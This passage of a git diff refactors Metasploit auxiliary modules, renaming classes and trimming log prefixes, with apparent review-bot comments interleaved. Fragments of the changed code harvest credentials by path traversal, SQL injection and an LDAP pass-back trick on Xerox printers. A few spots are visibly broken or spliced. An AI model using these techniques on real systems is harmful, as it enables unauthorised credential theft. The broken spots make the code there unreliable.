'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/corpwatch_lookup_name.rb b/modules/auxiliary/gather/corpwatch_lookup_name.rb index cf83fbecc9..6ca6ae70c6 100644 --- a/modules/auxiliary/gather/corpwatch_lookup_name.rb +++ b/modules/auxiliary/gather/corpwatch_lookup_name.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/d20pass.rb b/modules/auxiliary/gather/d20pass.rb index de42cb7159..cb1313bec2 100644 --- a/modules/auxiliary/gather/d20pass.rb +++ b/modules/auxiliary/gather/d20pass.rb 
@@ -12,7 +12,7 @@ require 'msf/core' require 'rex/ui/text/shell' require 'rex/proto/tftp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Rex::Ui::Text include Rex::Proto::TFTP include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index c87615aa62..d501492d94 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb +++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb index 3b4794fa3f..b32849874c 100644 --- a/modules/auxiliary/gather/dns_cache_scraper.rb +++ b/modules/auxiliary/gather/dns_cache_scraper.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/dns/resolver' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index 0834c5c16e..2a1d0aebd0 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 4726b53de9..cb960ba1d8 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_srv_enum.rb b/modules/auxiliary/gather/dns_srv_enum.rb index 31866fb56a..0bf36e086f 100644 --- a/modules/auxiliary/gather/dns_srv_enum.rb +++ b/modules/auxiliary/gather/dns_srv_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/doliwamp_traversal_creds.rb b/modules/auxiliary/gather/doliwamp_traversal_creds.rb index ac02e16386..93c6c5367b 100644 --- a/modules/auxiliary/gather/doliwamp_traversal_creds.rb +++ b/modules/auxiliary/gather/doliwamp_traversal_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary # def get_session_tokens tokens = nil - print_status("#{peer} - Finding session tokens...") + print_status("Finding session tokens...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri( @@ -52,15 +52,15 @@ class Metasploit3 < Msf::Auxiliary 'vars_post' => { 'dir' => datastore['TRAVERSAL_PATH'] } }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.code == 404 - print_error("#{peer} - Could not find 'jqueryFileTree.php'") + print_error("Could not find 'jqueryFileTree.php'") elsif res.code == 200 and res.body =~ />sess_([a-z0-9]+)sess_([a-z0-9]+) 'GET', 'uri' => normalize_uri(target_uri.path, 'user/fiche.php'), 
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary }.to_a.shuffle] }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.body =~ /User card/ record = [ res.body.scan(/name="login" value="([^"]+)"/ ).flatten.first, @@ -89,11 +89,11 @@ class Metasploit3 < Msf::Auxiliary res.body.scan(/name="email" class="flat" value="([^"]+)"/).flatten.first ] unless record.empty? - print_good("#{peer} - Found credentials (#{record[0]}:#{record[1]})") + print_good("Found credentials (#{record[0]}:#{record[1]})") return record end else - print_warning("#{peer} - Could not retrieve user credentials") + print_warning("Could not retrieve user credentials") end end @@ -106,13 +106,13 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => @cookie }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.body =~ /
    • }).flatten + vprint_good("#{peer} - Found #{hives.length} registry hives (#{hives.join(', ')})") + else + fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected reply (#{res.body.length} bytes)") + end + hives + end + + # + # Retrieve all registry hives + # + def dump_all + hives = retrieve_hive_list + if hives.blank? + print_error("#{peer} - Found no registry hives") + return + end + hives.each { |hive| dump_key(hive) } + end +end diff --git a/modules/auxiliary/gather/solarwinds_orion_sqli.rb b/modules/auxiliary/gather/solarwinds_orion_sqli.rb index 50ea93d350..9565fda3c8 100644 --- a/modules/auxiliary/gather/solarwinds_orion_sqli.rb +++ b/modules/auxiliary/gather/solarwinds_orion_sqli.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/ssllabs_scan.rb b/modules/auxiliary/gather/ssllabs_scan.rb index 316dd0886a..bbe30918cd 100644 --- a/modules/auxiliary/gather/ssllabs_scan.rb +++ b/modules/auxiliary/gather/ssllabs_scan.rb @@ -8,7 +8,7 @@ require 'active_support/inflector' require 'json' require 'active_support/core_ext/hash' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary class InvocationError < StandardError; end class RequestRateTooHigh < StandardError; end class InternalError < StandardError; end @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary name = name.to_s.camelize(:lower) uri = api_path + name - cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS1') + cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS') cli.connect req = cli.request_cgi({ 'uri' => uri, 
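Review bot: The API client in the ssllabs_scan hunk at -31 is built with a literal protocol string (`'TLS'`) rather than the module's own SSL option, and the later hunk at -430 removes the `'SSLVersion'` default, so the protocol version used for the API connection can only be changed by editing the code. Passing the datastore value, e.g. `Rex::Proto::Http::Client.new(api_host, api_port, {}, true, datastore['SSLVersion'])`, would keep a single source of truth, assuming that option is registered for this module, which the hunk does not show. A one-line comment saying why the version is no longer pinned to `TLS1` would also help. The enclosing method starts and ends outside the hunk.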
@@ -430,16 +430,15 @@ class Metasploit3 < Msf::Auxiliary { 'RPORT' => 443, 'SSL' => true, - 'SSLVersion' => 'TLS1' } )) register_options( [ OptString.new('HOSTNAME', [true, 'The target hostname']), OptInt.new('DELAY', [true, 'The delay in seconds between API requests', 5]), - OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', 'true']), - OptBool.new('GRADE', [true, 'Output only the hostname: grade', 'false']), - OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', 'true']) + OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', true]), + OptBool.new('GRADE', [true, 'Output only the hostname: grade', false]), + OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', true]) ], self.class) end diff --git a/modules/auxiliary/gather/trackit_sql_domain_creds.rb b/modules/auxiliary/gather/trackit_sql_domain_creds.rb index 68b1c93e02..79c7d70947 100644 --- a/modules/auxiliary/gather/trackit_sql_domain_creds.rb +++ b/modules/auxiliary/gather/trackit_sql_domain_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/vbulletin_vote_sqli.rb b/modules/auxiliary/gather/vbulletin_vote_sqli.rb index dbc12f74fc..35aab65f56 100644 --- a/modules/auxiliary/gather/vbulletin_vote_sqli.rb +++ b/modules/auxiliary/gather/vbulletin_vote_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient 
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary max = datastore["MAXNODE"] if min > max - print_error("#{peer} - MINNODE can't be major than MAXNODE") + print_error("MINNODE can't be major than MAXNODE") return nil end @@ -77,11 +77,11 @@ class Metasploit3 < Msf::Auxiliary def get_node if datastore['NODE'].nil? or datastore['NODE'] <= 0 - print_status("#{peer} - Brute forcing to find a valid node id...") + print_status("Brute forcing to find a valid node id...") return brute_force_node end - print_status("#{peer} - Checking node id #{datastore['NODE']}...") + print_status("Checking node id #{datastore['NODE']}...") if exists_node?(datastore['NODE']) return datastore['NODE'] else @@ -173,21 +173,21 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Checking for a valid node id...") + print_status("Checking for a valid node id...") node_id = get_node if node_id.nil? - print_error("#{peer} - node id not found") + print_error("node id not found") return end - print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...") + print_good("Using node id #{node_id} to exploit sqli... Counting users...") data = do_sqli(node_id, "select count(*) from user") if data.blank? - print_error("#{peer} - Error exploiting sqli") + print_error("Error exploiting sqli") return end count_users = data.to_i - print_good("#{peer} - #{count_users} users found. Collecting credentials...") + print_good("#{count_users} users found. Collecting credentials...") users_table = Rex::Ui::Text::Table.new( 'Header' => 'vBulletin Users', diff --git a/modules/auxiliary/gather/windows_deployment_services_shares.rb b/modules/auxiliary/gather/windows_deployment_services_shares.rb index c88ab1fc3f..b7777b64c9 100644 --- a/modules/auxiliary/gather/windows_deployment_services_shares.rb +++ b/modules/auxiliary/gather/windows_deployment_services_shares.rb 
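Review bot: The rewritten message `MINNODE can't be major than MAXNODE` is still hard to read; `print_error("MINNODE can't be greater than MAXNODE")` matches the `min > max` test it reports. In the hunk at -173, `count_users = data.to_i` turns any non-numeric reply into 0, so an unexpected response is reported as "0 users found" rather than as an error; `Integer(data, exception: false)` with a nil check, or a digits-only test on Rubies that lack that keyword, would separate the two cases. `run` continues past the end of that hunk.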
@@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/dcerpc' require 'rex/parser/unattend' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Exploit::Remote::SMB::Client::Authenticated diff --git a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb index b06dd773c8..c373f7da95 100644 --- a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb +++ b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Report @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Requesting website export...") + print_status("Requesting website export...") res = send_request_cgi( { 'method' => 'POST', @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary print_status("it does not allow WRITE permission to the all-in-one-wp-migration/storage directory.") else store_path = store_loot('wordpress.export', 'zip', datastore['RHOST'], res.body, 'wordpress_backup.zip', 'WordPress Database and Content Backup') - print_good("#{peer} - Backup archive saved to #{store_path}") + print_good("Backup archive saved to #{store_path}") end end end diff --git a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb index ebdc2ed1a7..6531db1dc8 100644 --- a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb +++ b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'csv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Report 
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary def process_row(row) if row[:user_login] && row[:user_pass] - print_good("#{peer} - Found credential: #{row[:user_login]}:#{row[:user_pass]}") + print_good("Found credential: #{row[:user_login]}:#{row[:user_pass]}") credential_data = { origin_type: :service, @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Requesting CSV extract...") + print_status("Requesting CSV extract...") res = send_request_cgi( 'method' => 'POST', 'uri' => exporter_url, @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 - print_status("#{peer} - Parsing response...") + print_status("Parsing response...") unless parse_csv(res.body, ',') unless parse_csv(res.body, ';') fail_with(Failure::UnexpectedReply, "#{peer} - Failed to parse response, the CSV was invalid") @@ -105,6 +105,6 @@ class Metasploit3 < Msf::Auxiliary end store_path = store_loot('wordpress.users.export', 'csv', datastore['RHOST'], res.body, 'users_export.csv', 'WordPress User Table Extract') - print_good("#{peer} - CSV saved to #{store_path}") + print_good("CSV saved to #{store_path}") end end diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb index 2dcc988ec3..b5de7b700e 100644 --- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb +++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/gather/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb index 20191221bd..a71c72732d 100644 
--- a/modules/auxiliary/gather/xbmc_traversal.rb +++ b/modules/auxiliary/gather/xbmc_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/xerox_pwd_extract.rb b/modules/auxiliary/gather/xerox_pwd_extract.rb index 36920371f8..37bbb39e81 100644 --- a/modules/auxiliary/gather/xerox_pwd_extract.rb +++ b/modules/auxiliary/gather/xerox_pwd_extract.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb index 7de04d2db7..0dc5277b72 100644 --- a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb +++ b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report @@ -37,11 +37,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Attempting to extract LDAP username and password...") + print_status("Attempting to extract LDAP username and password...") @auth_cookie = default_page if @auth_cookie.blank? - print_status("#{peer} - Unable to get authentication cookie from #{rhost}") + print_status("Unable to get authentication cookie from #{rhost}") return end 
@@ -56,10 +56,10 @@ class Metasploit3 < Msf::Auxiliary start_listener unless @data - print_error("#{peer} - Failed to start listiner or the printer did not send us the creds. :(") + print_error("Failed to start listiner or the printer did not send us the creds. :(") status = restore_ldap_server unless status - print_error("#{peer} - Failed to restore old LDAP server. Please manually restore") + print_error("Failed to restore old LDAP server. Please manually restore") end return end @@ -71,13 +71,13 @@ class Metasploit3 < Msf::Auxiliary ldap_creds = "#{ldap_binary_creds[0]}:#{ldap_binary_creds[1]}" # Woot we got creds so lets save them.# - print_good("#{peer} - The following creds were capured: #{ldap_creds}") + print_good("The following creds were capured: #{ldap_creds}") loot_name = 'ldap.cp.creds' loot_type = 'text/plain' loot_filename = 'ldap-creds.text' loot_desc = 'LDAP Pass-back Harvester' p = store_loot(loot_name, loot_type, datastore['RHOST'], @data, loot_filename, loot_desc) - print_status("#{peer} - Credentials saved in: #{p}") + print_status("Credentials saved in: #{p}") register_creds('ldap', rhost, @ldap_port, ldap_binary_creds[0], ldap_binary_creds[1]) end @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary method = 'GET' res = make_request(page, method, '') if res.blank? || res.code != 200 - print_error("#{peer} - Failed to connect to #{rhost}. Please check the printers IP address.") + print_error("Failed to connect to #{rhost}. Please check the printers IP address.") return '' end res.get_cookies @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Auxiliary res = make_request(login_page, method, login_post_data) if res.blank? || res.code != 200 - print_error("#{peer} - Failed to login. Please check the password for the Administrator account") + print_error("Failed to login. Please check the password for the Administrator account") return nil end res.code 
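Review bot: The messages rewritten in these hunks keep their spelling errors: `listiner` in the hunk at -56, `capured` in the hunk at -71, and `reqeust` in the later hunk at -184. Every one of these lines is already being touched, so the fix belongs in the same change: `"Failed to start listener or the printer did not send us the creds. :("`, `"The following creds were captured: #{ldap_creds}"` and `"Triggering LDAP request"`.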
@@ -126,9 +126,9 @@ class Metasploit3 < Msf::Auxiliary ldap_port_number = ldap_port_settings.scan(/valPrt_1\[2\] = (\d+)/).flatten @ldap_server = "#{ldap_server_ip[0]}.#{ldap_server_ip[1]}.#{ldap_server_ip[2]}.#{ldap_server_ip[3]}" @ldap_port = ldap_port_number[0] - print_status("#{peer} - LDAP server: #{@ldap_server}") + print_status("LDAP server: #{@ldap_server}") unless res.code == 200 || res.blank? - print_error("#{peer} - Failed to get LDAP data.") + print_error("Failed to get LDAP data.") return nil end res.code @@ -149,10 +149,10 @@ class Metasploit3 < Msf::Auxiliary ldap_update_post *= '&' method = 'POST' - print_status("#{peer} - Updating LDAP server: #{datastore['NewLDAPServer']} and port: #{datastore['SRVPORT']}") + print_status("Updating LDAP server: #{datastore['NewLDAPServer']} and port: #{datastore['SRVPORT']}") res = make_request(ldap_update_page, method, ldap_update_post) if res.blank? || res.code != 200 - print_error("#{peer} - Failed to update LDAP server. Please check the host: #{rhost}") + print_error("Failed to update LDAP server. Please check the host: #{rhost}") return nil end res.code @@ -184,7 +184,7 @@ class Metasploit3 < Msf::Auxiliary ldap_trigger_post *= '&' method = 'POST' - print_status("#{peer} - Triggering LDAP reqeust") + print_status("Triggering LDAP reqeust") res = make_request(ldap_trigger_page, method, ldap_trigger_post) res.code end @@ -243,10 +243,10 @@ class Metasploit3 < Msf::Auxiliary ldap_restore_post *= '&' method = 'POST' - print_status("#{peer} - Restoring LDAP server: #{@ldap_server}") + print_status("Restoring LDAP server: #{@ldap_server}") res = make_request(ldap_restore_page, method, ldap_restore_post) if res.blank? || res.code != 200 - print_error("#{peer} - Failed to restore LDAP server: #{@ldap_server}. Please fix manually") + print_error("Failed to restore LDAP server: #{@ldap_server}. Please fix manually") return nil end res.code 
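Review bot: In the `@@ -126,9 +126,9` hunk the guard `unless res.code == 200 || res.blank?` calls `res.code` before testing for a missing response, and as written it skips the error branch when the response is blank. The sibling methods use `if res.blank? || res.code != 200`, and this guard should match them. It should presumably also run before the `scan` calls that parse the settings page; the start of the method is outside the hunk, so that ordering is inferred. The `@@ -184,7` hunk has the same gap: `res.code` follows `make_request` with no nil check, while the `@@ -265,7` hunk suggests `make_request` returns an unset `res` after a rescued connection error.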
@@ -265,7 +265,7 @@ class Metasploit3 < Msf::Auxiliary }, datastore['TIMEOUT'].to_i) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - print_error("#{peer} - Connection failed.") + print_error("Connection failed.") end res diff --git a/modules/auxiliary/parser/unattend.rb b/modules/auxiliary/parser/unattend.rb index 7ad4e310cd..b799364b31 100644 --- a/modules/auxiliary/parser/unattend.rb +++ b/modules/auxiliary/parser/unattend.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/parser/unattend' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize(info={}) super( update_info( info, diff --git a/modules/auxiliary/pdf/foxit/authbypass.rb b/modules/auxiliary/pdf/foxit/authbypass.rb index 438a3ecaee..bcf0040fa6 100644 --- a/modules/auxiliary/pdf/foxit/authbypass.rb +++ b/modules/auxiliary/pdf/foxit/authbypass.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::FILEFORMAT diff --git a/modules/auxiliary/scanner/acpp/login.rb b/modules/auxiliary/scanner/acpp/login.rb index 10047d1b06..ea91ad047d 100644 --- a/modules/auxiliary/scanner/acpp/login.rb +++ b/modules/auxiliary/scanner/acpp/login.rb @@ -8,7 +8,7 @@ require 'rex/proto/acpp' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/acpp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/afp/afp_login.rb b/modules/auxiliary/scanner/afp/afp_login.rb index 74aa22c26a..79ff59603a 100644 --- a/modules/auxiliary/scanner/afp/afp_login.rb +++ b/modules/auxiliary/scanner/afp/afp_login.rb 
@@ -8,7 +8,7 @@ require 'openssl' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/afp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/afp/afp_server_info.rb b/modules/auxiliary/scanner/afp/afp_server_info.rb index 5a7c4edc0c..b8de8c4b40 100644 --- a/modules/auxiliary/scanner/afp/afp_server_info.rb +++ b/modules/auxiliary/scanner/afp/afp_server_info.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb index d48bc8a561..c2925cb87d 100644 --- a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb +++ b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/chargen/chargen_probe.rb b/modules/auxiliary/scanner/chargen/chargen_probe.rb index fe43a0e3e5..3dc4381ead 100644 --- a/modules/auxiliary/scanner/chargen/chargen_probe.rb +++ b/modules/auxiliary/scanner/chargen/chargen_probe.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Capture diff --git a/modules/auxiliary/scanner/couchdb/couchdb_enum.rb b/modules/auxiliary/scanner/couchdb/couchdb_enum.rb index 9e36f7fd21..8a00c5aa99 100644 --- a/modules/auxiliary/scanner/couchdb/couchdb_enum.rb +++ b/modules/auxiliary/scanner/couchdb/couchdb_enum.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary temp = JSON.parse(res.body) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e - print_error("#{peer} - The following Error was encountered: #{e.class}") + print_error("The following Error was encountered: #{e.class}") return end @@ -64,9 +64,9 @@ class Metasploit3 < Msf::Auxiliary 'CouchDB Enum' ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Unable to enum, received \"#{res.code}\"") + print_error("Unable to enum, received \"#{res.code}\"") end end end diff --git a/modules/auxiliary/scanner/couchdb/couchdb_login.rb b/modules/auxiliary/scanner/couchdb/couchdb_login.rb index 5782874ac1..9cad284af0 100644 --- a/modules/auxiliary/scanner/couchdb/couchdb_login.rb +++ b/modules/auxiliary/scanner/couchdb/couchdb_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/db2/db2_auth.rb b/modules/auxiliary/scanner/db2/db2_auth.rb index b5afbe1bab..01a50ca23e 100644 --- a/modules/auxiliary/scanner/db2/db2_auth.rb +++ b/modules/auxiliary/scanner/db2/db2_auth.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/db2' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/db2/db2_version.rb b/modules/auxiliary/scanner/db2/db2_version.rb index 3feac07d07..3344d38509 100644 --- a/modules/auxiliary/scanner/db2/db2_version.rb 
+++ b/modules/auxiliary/scanner/db2/db2_version.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/db2/discovery.rb b/modules/auxiliary/scanner/db2/discovery.rb index 3b6aea526d..01dee58103 100644 --- a/modules/auxiliary/scanner/db2/discovery.rb +++ b/modules/auxiliary/scanner/db2/discovery.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb index f99da3d29f..f451ba0dbc 100644 --- a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb +++ b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/hidden.rb b/modules/auxiliary/scanner/dcerpc/hidden.rb index 79c2b359f7..379d331e20 100644 --- a/modules/auxiliary/scanner/dcerpc/hidden.rb +++ b/modules/auxiliary/scanner/dcerpc/hidden.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/management.rb b/modules/auxiliary/scanner/dcerpc/management.rb index 753450426a..fc84d4d9b8 100644 --- a/modules/auxiliary/scanner/dcerpc/management.rb +++ b/modules/auxiliary/scanner/dcerpc/management.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC 
